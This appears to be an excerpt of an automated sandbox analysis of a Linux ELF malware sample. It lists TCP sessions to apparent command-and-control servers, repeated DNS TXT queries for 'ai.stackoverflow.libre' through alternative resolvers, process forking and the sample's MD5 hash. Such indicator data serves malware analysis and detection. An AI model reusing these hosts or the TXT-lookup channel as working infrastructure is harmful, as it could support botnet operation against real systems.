                                                      Jan 4, 2025 23:58:12.492338896 CET4623010321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:12.497240067 CET103214623038.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:58:12.497292995 CET4623010321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:13.500531912 CET103214623038.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:58:13.500613928 CET4623010321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:13.500613928 CET4623010321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:13.505623102 CET103214623038.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:58:13.505667925 CET4623010321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:14.506309032 CET43928443192.168.2.2391.189.91.42
                                                      Jan 4, 2025 23:58:26.792589903 CET42836443192.168.2.2391.189.91.43
                                                      Jan 4, 2025 23:58:30.024395943 CET4623210321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:30.029485941 CET103214623238.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:58:30.029546022 CET4623210321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:30.888060093 CET4251680192.168.2.23109.202.202.202
                                                      Jan 4, 2025 23:58:31.041831970 CET103214623238.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:58:31.041960955 CET4623210321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:31.041989088 CET4623210321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:31.046926022 CET103214623238.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:58:31.046974897 CET103214623238.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:58:31.047065020 CET4623210321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:45.559104919 CET4623410321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:45.563940048 CET103214623438.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:58:45.564021111 CET4623410321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:46.585069895 CET103214623438.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:58:46.585134983 CET4623410321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:46.585134983 CET4623410321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:46.590125084 CET103214623438.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:58:46.590212107 CET4623410321192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:58:55.460622072 CET43928443192.168.2.2391.189.91.42
                                                      Jan 4, 2025 23:58:57.239820004 CET546505837192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:58:57.244667053 CET583754650188.166.182.194192.168.2.23
                                                      Jan 4, 2025 23:58:57.244729996 CET546505837192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:58:58.065284014 CET583754650188.166.182.194192.168.2.23
                                                      Jan 4, 2025 23:58:58.065356970 CET546505837192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:58:58.240580082 CET546505837192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:58:58.245616913 CET583754650188.166.182.194192.168.2.23
                                                      Jan 4, 2025 23:58:58.245678902 CET546505837192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:59:08.714560032 CET3384031428192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:59:08.719434977 CET3142833840188.166.182.194192.168.2.23
                                                      Jan 4, 2025 23:59:08.719501972 CET3384031428192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:59:09.565321922 CET3142833840188.166.182.194192.168.2.23
                                                      Jan 4, 2025 23:59:09.565387011 CET3384031428192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:59:09.715706110 CET3384031428192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:59:09.720818996 CET3142833840188.166.182.194192.168.2.23
                                                      Jan 4, 2025 23:59:09.720879078 CET3384031428192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:59:22.300407887 CET5229045123192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:59:22.305286884 CET451235229038.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:59:22.305325031 CET5229045123192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:59:23.315282106 CET451235229038.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:59:23.315330029 CET5229045123192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:59:23.315330029 CET5229045123192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:59:23.320488930 CET451235229038.60.221.89192.168.2.23
                                                      Jan 4, 2025 23:59:23.320533037 CET5229045123192.168.2.2338.60.221.89
                                                      Jan 4, 2025 23:59:35.844572067 CET546565837192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:59:35.849332094 CET583754656188.166.182.194192.168.2.23
                                                      Jan 4, 2025 23:59:35.849391937 CET546565837192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:59:36.687613010 CET583754656188.166.182.194192.168.2.23
                                                      Jan 4, 2025 23:59:36.687669992 CET546565837192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:59:36.845360041 CET546565837192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:59:36.850409031 CET583754656188.166.182.194192.168.2.23
                                                      Jan 4, 2025 23:59:36.850456953 CET546565837192.168.2.23188.166.182.194
                                                      Jan 4, 2025 23:59:49.361191034 CET3707619823192.168.2.23156.244.6.20
                                                      Jan 4, 2025 23:59:49.366045952 CET1982337076156.244.6.20192.168.2.23
                                                      Jan 4, 2025 23:59:49.366112947 CET3707619823192.168.2.23156.244.6.20
                                                      Jan 4, 2025 23:59:50.337167025 CET1982337076156.244.6.20192.168.2.23
                                                      Jan 4, 2025 23:59:50.337212086 CET3707619823192.168.2.23156.244.6.20
                                                      Jan 4, 2025 23:59:50.361887932 CET3707619823192.168.2.23156.244.6.20
                                                      Jan 4, 2025 23:59:50.367218018 CET1982337076156.244.6.20192.168.2.23
                                                      Jan 4, 2025 23:59:50.367253065 CET3707619823192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:00.827198982 CET5602845123192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:00.832026005 CET4512356028156.244.6.20192.168.2.23
                                                      Jan 5, 2025 00:00:00.832088947 CET5602845123192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:01.804971933 CET4512356028156.244.6.20192.168.2.23
                                                      Jan 5, 2025 00:00:01.805062056 CET5602845123192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:01.829237938 CET5602845123192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:01.834249973 CET4512356028156.244.6.20192.168.2.23
                                                      Jan 5, 2025 00:00:01.834294081 CET5602845123192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:12.343765020 CET5819049657192.168.2.23188.166.182.194
                                                      Jan 5, 2025 00:00:12.621694088 CET4965758190188.166.182.194192.168.2.23
                                                      Jan 5, 2025 00:00:12.621788025 CET5819049657192.168.2.23188.166.182.194
                                                      Jan 5, 2025 00:00:13.451224089 CET4965758190188.166.182.194192.168.2.23
                                                      Jan 5, 2025 00:00:13.451299906 CET5819049657192.168.2.23188.166.182.194
                                                      Jan 5, 2025 00:00:13.451333046 CET5819049657192.168.2.23188.166.182.194
                                                      Jan 5, 2025 00:00:13.457190037 CET4965758190188.166.182.194192.168.2.23
                                                      Jan 5, 2025 00:00:13.457283020 CET5819049657192.168.2.23188.166.182.194
                                                      Jan 5, 2025 00:00:23.941917896 CET5603245123192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:23.946679115 CET4512356032156.244.6.20192.168.2.23
                                                      Jan 5, 2025 00:00:23.946747065 CET5603245123192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:24.958971977 CET4512356032156.244.6.20192.168.2.23
                                                      Jan 5, 2025 00:00:24.959028959 CET5603245123192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:24.959055901 CET5603245123192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:24.964061022 CET4512356032156.244.6.20192.168.2.23
                                                      Jan 5, 2025 00:00:24.964131117 CET5603245123192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:35.434572935 CET4169218234192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:00:35.439429998 CET182344169238.60.221.89192.168.2.23
                                                      Jan 5, 2025 00:00:35.439505100 CET4169218234192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:00:36.461657047 CET182344169238.60.221.89192.168.2.23
                                                      Jan 5, 2025 00:00:36.461755991 CET4169218234192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:00:36.461803913 CET4169218234192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:00:36.466902018 CET182344169238.60.221.89192.168.2.23
                                                      Jan 5, 2025 00:00:36.467210054 CET182344169238.60.221.89192.168.2.23
                                                      Jan 5, 2025 00:00:36.467278004 CET4169218234192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:00:46.931759119 CET471245429192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:46.936618090 CET542947124156.244.6.20192.168.2.23
                                                      Jan 5, 2025 00:00:46.936706066 CET471245429192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:47.917716980 CET542947124156.244.6.20192.168.2.23
                                                      Jan 5, 2025 00:00:47.917804956 CET471245429192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:47.932547092 CET471245429192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:47.937752962 CET542947124156.244.6.20192.168.2.23
                                                      Jan 5, 2025 00:00:47.937809944 CET471245429192.168.2.23156.244.6.20
                                                      Jan 5, 2025 00:00:58.441430092 CET5429662849192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:00:58.446293116 CET628495429638.60.221.89192.168.2.23
                                                      Jan 5, 2025 00:00:58.446340084 CET5429662849192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:00:59.464685917 CET628495429638.60.221.89192.168.2.23
                                                      Jan 5, 2025 00:00:59.464732885 CET5429662849192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:00:59.464824915 CET5429662849192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:00:59.469804049 CET628495429638.60.221.89192.168.2.23
                                                      Jan 5, 2025 00:00:59.469865084 CET5429662849192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:01:11.971227884 CET3463631428192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:01:11.976025105 CET314283463638.60.221.89192.168.2.23
                                                      Jan 5, 2025 00:01:11.976103067 CET3463631428192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:01:13.013537884 CET314283463638.60.221.89192.168.2.23
                                                      Jan 5, 2025 00:01:13.013607979 CET3463631428192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:01:13.013654947 CET3463631428192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:01:13.018668890 CET314283463638.60.221.89192.168.2.23
                                                      Jan 5, 2025 00:01:13.018727064 CET3463631428192.168.2.2338.60.221.89
                                                      Jan 5, 2025 00:01:25.497220039 CET4953464715192.168.2.23188.166.182.194
                                                      Jan 5, 2025 00:01:25.501997948 CET6471549534188.166.182.194192.168.2.23
                                                      Jan 5, 2025 00:01:25.502048016 CET4953464715192.168.2.23188.166.182.194
                                                      Jan 5, 2025 00:01:26.306862116 CET6471549534188.166.182.194192.168.2.23
                                                      Jan 5, 2025 00:01:26.306929111 CET4953464715192.168.2.23188.166.182.194
                                                      Jan 5, 2025 00:01:26.498007059 CET4953464715192.168.2.23188.166.182.194
                                                      Jan 5, 2025 00:01:26.502922058 CET6471549534188.166.182.194192.168.2.23
                                                      Jan 5, 2025 00:01:26.503002882 CET6471549534188.166.182.194192.168.2.23
                                                      Jan 5, 2025 00:01:26.503070116 CET4953464715192.168.2.23188.166.182.194
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 4, 2025 23:57:54.974787951 CET4344453192.168.2.23194.36.144.87
                                                      Jan 4, 2025 23:57:54.991585970 CET5343444194.36.144.87192.168.2.23
                                                      Jan 4, 2025 23:57:56.001086950 CET4224119302192.168.2.2374.125.250.129
                                                      Jan 4, 2025 23:57:56.450494051 CET193024224174.125.250.129192.168.2.23
                                                      Jan 4, 2025 23:58:06.456080914 CET5276553192.168.2.23134.195.4.2
                                                      Jan 4, 2025 23:58:08.459187984 CET4976053192.168.2.2394.16.114.254
                                                      Jan 4, 2025 23:58:10.474891901 CET5303153192.168.2.2391.217.137.37
                                                      Jan 4, 2025 23:58:13.500665903 CET3615819302192.168.2.2374.125.250.129
                                                      Jan 4, 2025 23:58:13.970278025 CET193023615874.125.250.129192.168.2.23
                                                      Jan 4, 2025 23:58:23.978637934 CET5062453192.168.2.23134.195.4.2
                                                      Jan 4, 2025 23:58:25.992744923 CET3707553192.168.2.23178.254.22.166
                                                      Jan 4, 2025 23:58:28.008455992 CET5545753192.168.2.2351.254.162.59
                                                      Jan 4, 2025 23:58:31.042027950 CET5448719302192.168.2.2374.125.250.129
                                                      Jan 4, 2025 23:58:31.514573097 CET193025448774.125.250.129192.168.2.23
                                                      Jan 4, 2025 23:58:41.522604942 CET5960053192.168.2.2351.254.162.59
                                                      Jan 4, 2025 23:58:43.526309013 CET5260653192.168.2.23134.195.4.2
                                                      Jan 4, 2025 23:58:45.542047977 CET5621853192.168.2.23194.36.144.87
                                                      Jan 4, 2025 23:58:45.558744907 CET5356218194.36.144.87192.168.2.23
                                                      Jan 4, 2025 23:58:46.585181952 CET6042919302192.168.2.2374.125.250.129
                                                      Jan 4, 2025 23:58:47.224714994 CET193026042974.125.250.129192.168.2.23
                                                      Jan 4, 2025 23:58:57.232409000 CET5752353192.168.2.23195.10.195.195
                                                      Jan 4, 2025 23:58:57.239484072 CET5357523195.10.195.195192.168.2.23
                                                      Jan 4, 2025 23:58:58.240613937 CET4956719302192.168.2.2374.125.250.129
                                                      Jan 4, 2025 23:58:58.692084074 CET193024956774.125.250.129192.168.2.23
                                                      Jan 4, 2025 23:59:08.698977947 CET4203353192.168.2.2351.77.149.139
                                                      Jan 4, 2025 23:59:08.714210033 CET534203351.77.149.139192.168.2.23
                                                      Jan 4, 2025 23:59:09.715755939 CET3543719302192.168.2.2374.125.250.129
                                                      Jan 4, 2025 23:59:10.240483046 CET193023543774.125.250.129192.168.2.23
                                                      Jan 4, 2025 23:59:20.249238968 CET5247653192.168.2.2351.254.162.59
                                                      Jan 4, 2025 23:59:22.272952080 CET5438853192.168.2.2381.169.136.222
                                                      Jan 4, 2025 23:59:22.300123930 CET535438881.169.136.222192.168.2.23
                                                      Jan 4, 2025 23:59:23.315382004 CET4075019302192.168.2.2374.125.250.129
                                                      Jan 4, 2025 23:59:23.785990953 CET193024075074.125.250.129192.168.2.23
                                                      Jan 4, 2025 23:59:33.791337013 CET4791853192.168.2.2351.254.162.59
                                                      Jan 4, 2025 23:59:35.811084986 CET4565253192.168.2.23185.181.61.24
                                                      Jan 4, 2025 23:59:35.844252110 CET5345652185.181.61.24192.168.2.23
                                                      Jan 4, 2025 23:59:36.845402956 CET3305219302192.168.2.2374.125.250.129
                                                      Jan 4, 2025 23:59:37.309001923 CET193023305274.125.250.129192.168.2.23
                                                      Jan 4, 2025 23:59:47.317480087 CET4481853192.168.2.2394.16.114.254
                                                      Jan 4, 2025 23:59:49.345206976 CET3953153192.168.2.2351.158.108.203
                                                      Jan 4, 2025 23:59:49.360853910 CET533953151.158.108.203192.168.2.23
                                                      Jan 4, 2025 23:59:50.361934900 CET5047619302192.168.2.2374.125.250.129
                                                      Jan 4, 2025 23:59:50.813299894 CET193025047674.125.250.129192.168.2.23
                                                      Jan 5, 2025 00:00:00.819729090 CET4368953192.168.2.23195.10.195.195
                                                      Jan 5, 2025 00:00:00.826688051 CET5343689195.10.195.195192.168.2.23
                                                      Jan 5, 2025 00:00:01.829343081 CET4043619302192.168.2.2374.125.250.129
                                                      Jan 5, 2025 00:00:02.302961111 CET193024043674.125.250.129192.168.2.23
                                                      Jan 5, 2025 00:00:12.310009003 CET5434453192.168.2.23185.181.61.24
                                                      Jan 5, 2025 00:00:12.343282938 CET5354344185.181.61.24192.168.2.23
                                                      Jan 5, 2025 00:00:13.451363087 CET3537619302192.168.2.2374.125.250.129
                                                      Jan 5, 2025 00:00:13.915621996 CET193023537674.125.250.129192.168.2.23
                                                      Jan 5, 2025 00:00:23.924408913 CET5081053192.168.2.23194.36.144.87
                                                      Jan 5, 2025 00:00:23.941479921 CET5350810194.36.144.87192.168.2.23
                                                      Jan 5, 2025 00:00:24.959116936 CET4672419302192.168.2.2374.125.250.129
                                                      Jan 5, 2025 00:00:25.411737919 CET193024672474.125.250.129192.168.2.23
                                                      Jan 5, 2025 00:00:35.418808937 CET3833753192.168.2.2351.158.108.203
                                                      Jan 5, 2025 00:00:35.434241056 CET533833751.158.108.203192.168.2.23
                                                      Jan 5, 2025 00:00:36.461838007 CET5142519302192.168.2.2374.125.250.129
                                                      Jan 5, 2025 00:00:36.916178942 CET193025142574.125.250.129192.168.2.23
                                                      Jan 5, 2025 00:00:46.922533989 CET4519253192.168.2.2351.77.149.139
                                                      Jan 5, 2025 00:00:46.931411028 CET534519251.77.149.139192.168.2.23
                                                      Jan 5, 2025 00:00:47.932585955 CET6013919302192.168.2.2374.125.250.129
                                                      Jan 5, 2025 00:00:48.426116943 CET193026013974.125.250.129192.168.2.23
                                                      Jan 5, 2025 00:00:58.433866024 CET5922053192.168.2.23195.10.195.195
                                                      Jan 5, 2025 00:00:58.441099882 CET5359220195.10.195.195192.168.2.23
                                                      Jan 5, 2025 00:00:59.464873075 CET5041219302192.168.2.2374.125.250.129
                                                      Jan 5, 2025 00:00:59.923084021 CET193025041274.125.250.129192.168.2.23
                                                      Jan 5, 2025 00:01:09.930032015 CET3655153192.168.2.23134.195.4.2
                                                      Jan 5, 2025 00:01:11.953751087 CET5111853192.168.2.23194.36.144.87
                                                      Jan 5, 2025 00:01:11.970887899 CET5351118194.36.144.87192.168.2.23
                                                      Jan 5, 2025 00:01:13.013667107 CET5599819302192.168.2.2374.125.250.129
                                                      Jan 5, 2025 00:01:13.473143101 CET193025599874.125.250.129192.168.2.23
                                                      Jan 5, 2025 00:01:23.480252028 CET5057253192.168.2.2394.16.114.254
                                                      Jan 5, 2025 00:01:25.487900019 CET4301653192.168.2.2351.77.149.139
                                                      Jan 5, 2025 00:01:25.496854067 CET534301651.77.149.139192.168.2.23
                                                      Jan 5, 2025 00:01:26.498055935 CET3964619302192.168.2.2374.125.250.129
                                                      Jan 5, 2025 00:01:26.957962036 CET193023964674.125.250.129192.168.2.23
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Jan 4, 2025 23:57:54.974787951 CET192.168.2.23194.36.144.870x76baStandard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 4, 2025 23:58:06.456080914 CET192.168.2.23134.195.4.20x79d3Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 4, 2025 23:58:08.459187984 CET192.168.2.2394.16.114.2540xab56Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 4, 2025 23:58:10.474891901 CET192.168.2.2391.217.137.370x2bbeStandard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 4, 2025 23:58:23.978637934 CET192.168.2.23134.195.4.20x5692Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 4, 2025 23:58:25.992744923 CET192.168.2.23178.254.22.1660x2844Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 4, 2025 23:58:28.008455992 CET192.168.2.2351.254.162.590x20c7Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 4, 2025 23:58:41.522604942 CET192.168.2.2351.254.162.590xbe74Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 4, 2025 23:58:43.526309013 CET192.168.2.23134.195.4.20xae9dStandard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 4, 2025 23:58:45.542047977 CET192.168.2.23194.36.144.870x2b08Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 4, 2025 23:58:57.232409000 CET192.168.2.23195.10.195.1950x1f11Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 4, 2025 23:59:08.698977947 CET192.168.2.2351.77.149.1390xc468Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 4, 2025 23:59:20.249238968 CET192.168.2.2351.254.162.590xf34Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 4, 2025 23:59:22.272952080 CET192.168.2.2381.169.136.2220x608cStandard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 4, 2025 23:59:33.791337013 CET192.168.2.2351.254.162.590x9c1dStandard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 4, 2025 23:59:35.811084986 CET192.168.2.23185.181.61.240xa563Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 4, 2025 23:59:47.317480087 CET192.168.2.2394.16.114.2540x2be9Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 4, 2025 23:59:49.345206976 CET192.168.2.2351.158.108.2030x30c0Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 5, 2025 00:00:00.819729090 CET192.168.2.23195.10.195.1950x7050Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 5, 2025 00:00:12.310009003 CET192.168.2.23185.181.61.240x8859Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 5, 2025 00:00:23.924408913 CET192.168.2.23194.36.144.870x7056Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 5, 2025 00:00:35.418808937 CET192.168.2.2351.158.108.2030x3400Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 5, 2025 00:00:46.922533989 CET192.168.2.2351.77.149.1390xbeddStandard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 5, 2025 00:00:58.433866024 CET192.168.2.23195.10.195.1950x47a7Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 5, 2025 00:01:09.930032015 CET192.168.2.23134.195.4.20x6328Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 5, 2025 00:01:11.953751087 CET192.168.2.23194.36.144.870x33eStandard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 5, 2025 00:01:23.480252028 CET192.168.2.2394.16.114.2540x9e2dStandard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      Jan 5, 2025 00:01:25.487900019 CET192.168.2.2351.77.149.1390x480cStandard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Jan 4, 2025 23:57:54.991585970 CET194.36.144.87192.168.2.230x76baNo error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                      Jan 4, 2025 23:58:45.558744907 CET194.36.144.87192.168.2.230x2b08No error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                      Jan 4, 2025 23:58:57.239484072 CET195.10.195.195192.168.2.230x1f11No error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                      Jan 4, 2025 23:59:08.714210033 CET51.77.149.139192.168.2.230xc468No error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                      Jan 4, 2025 23:59:22.300123930 CET81.169.136.222192.168.2.230x608cNo error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                      Jan 4, 2025 23:59:35.844252110 CET185.181.61.24192.168.2.230xa563No error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                      Jan 4, 2025 23:59:49.360853910 CET51.158.108.203192.168.2.230x30c0No error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                      Jan 5, 2025 00:00:00.826688051 CET195.10.195.195192.168.2.230x7050No error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                      Jan 5, 2025 00:00:12.343282938 CET185.181.61.24192.168.2.230x8859No error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                      Jan 5, 2025 00:00:23.941479921 CET194.36.144.87192.168.2.230x7056No error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                      Jan 5, 2025 00:00:35.434241056 CET51.158.108.203192.168.2.230x3400No error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                      Jan 5, 2025 00:00:46.931411028 CET51.77.149.139192.168.2.230xbeddNo error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                      Jan 5, 2025 00:00:58.441099882 CET195.10.195.195192.168.2.230x47a7No error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                      Jan 5, 2025 00:01:11.970887899 CET194.36.144.87192.168.2.230x33eNo error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                      Jan 5, 2025 00:01:25.496854067 CET51.77.149.139192.168.2.230x480cNo error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false

                                                      System Behavior

                                                      Start time (UTC):22:57:52
                                                      Start date (UTC):04/01/2025
                                                      Path:/tmp/i686.elf
                                                      Arguments:/tmp/i686.elf
                                                      File size:91792 bytes
                                                      MD5 hash:20f4bca1aa1a3bcdf7d2b60cea290831

                                                      Start time (UTC):22:57:53
                                                      Start date (UTC):04/01/2025
                                                      Path:/tmp/i686.elf
                                                      Arguments:-
                                                      File size:91792 bytes
                                                      MD5 hash:20f4bca1aa1a3bcdf7d2b60cea290831

                                                      Start time (UTC):22:57:53
                                                      Start date (UTC):04/01/2025
                                                      Path:/tmp/i686.elf
                                                      Arguments:-
                                                      File size:91792 bytes
                                                      MD5 hash:20f4bca1aa1a3bcdf7d2b60cea290831

                                                      Start time (UTC):22:57:53
                                                      Start date (UTC):04/01/2025
                                                      Path:/tmp/i686.elf
                                                      Arguments:-
                                                      File size:91792 bytes
                                                      MD5 hash:20f4bca1aa1a3bcdf7d2b60cea290831

                                                      Start time (UTC):22:57:54
                                                      Start date (UTC):04/01/2025
                                                      Path:/tmp/i686.elf
                                                      Arguments:-
                                                      File size:91792 bytes
                                                      MD5 hash:20f4bca1aa1a3bcdf7d2b60cea290831

                                                      Start time (UTC):22:57:54
                                                      Start date (UTC):04/01/2025
                                                      Path:/tmp/i686.elf
                                                      Arguments:-
                                                      File size:91792 bytes
                                                      MD5 hash:20f4bca1aa1a3bcdf7d2b60cea290831